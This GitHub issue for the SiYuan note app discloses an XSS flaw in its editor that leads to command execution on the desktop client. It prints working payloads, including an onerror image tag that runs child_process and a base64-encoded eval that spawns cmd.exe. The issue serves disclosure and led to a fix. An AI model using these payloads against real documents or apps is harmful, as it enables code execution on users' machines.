We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
正文中由于标签过滤不严谨存在XSS漏洞,且由于未限制通过require 引入child_process因此可以执行系统命令,同样的,通过process 也可以执行系统命令
修复XSS漏洞以及electron导致的命令执行问题
新建文档插入如下poc
![a]("onerror="alert(1))
客户端效果如下
浏览器效果如下
我们接下来就可以直接通过require进行命令执行,比如唤起计算器,新建文档插入如下POC,当用户打开文档即可触发
![a]("onerror="require('child_process').exec('open -a Calculator',null);)
Windows以及process同理,poc同下
![a]("onerror="eval(atob('dmFyIFByb2Nlc3MgPSB3aW5kb3cucGFyZW50LnRvcC5wcm9jZXNzLmJpbmRpbmcoJ3Byb2Nlc3Nfd3JhcCcpLlByb2Nlc3M7CnZhciBwcm9jID0gbmV3IFByb2Nlc3MoKTsKcHJvYy5vbmV4aXQgPSBmdW5jdGlvbiAoYSwgYikge307CnZhciBlbnYgPSB3aW5kb3cucGFyZW50LnRvcC5wcm9jZXNzLmVudjsKdmFyIGVudl8gPSBbXTsKZm9yICh2YXIga2V5IGluIGVudikgZW52Xy5wdXNoKGtleSArICc9JyArIGVudltrZXldKTsKcHJvYy5zcGF3bih7CiAgICBmaWxlOiAnY21kLmV4ZScsCiAgICBhcmdzOiBbJy9rIGNhbGMnXSwKICAgIGN3ZDogbnVsbCwKICAgIHdpbmRvd3NWZXJiYXRpbUFyZ3VtZW50czogZmFsc2UsCiAgICBkZXRhY2hlZDogZmFsc2UsCiAgICBlbnZQYWlyczogZW52XywKICAgIHN0ZGlvOiBbewogICAgICAgIHR5cGU6ICdpZ25vcmUnCiAgICB9LCB7CiAgICAgICAgdHlwZTogJ2lnbm9yZScKICAgIH0sIHsKICAgICAgICB0eXBlOiAnaWdub3JlJwogICAgfV0KfSk7')))
The text was updated successfully, but these errors were encountered:
🐛 Protyle XSS 导致客户端 RCE siyuan-note/siyuan#3431
89b53ce
厂商确认,CNVD编号,安排上 😄
Sorry, something went wrong.
请大家帮忙继续找找安全方面的漏洞,谢谢。
88250
No branches or pull requests
描述问题 Describe the problem
正文中由于标签过滤不严谨存在XSS漏洞,且由于未限制通过require 引入child_process因此可以执行系统命令,同样的,通过process 也可以执行系统命令
期待的结果 Expected result
修复XSS漏洞以及electron导致的命令执行问题
截屏或者录屏演示 Screenshot or screen recording presentation
XSS
新建文档插入如下poc
客户端效果如下
浏览器效果如下
命令执行
我们接下来就可以直接通过require进行命令执行,比如唤起计算器,新建文档插入如下POC,当用户打开文档即可触发
Windows以及process同理,poc同下
版本环境 Version environment
The text was updated successfully, but these errors were encountered: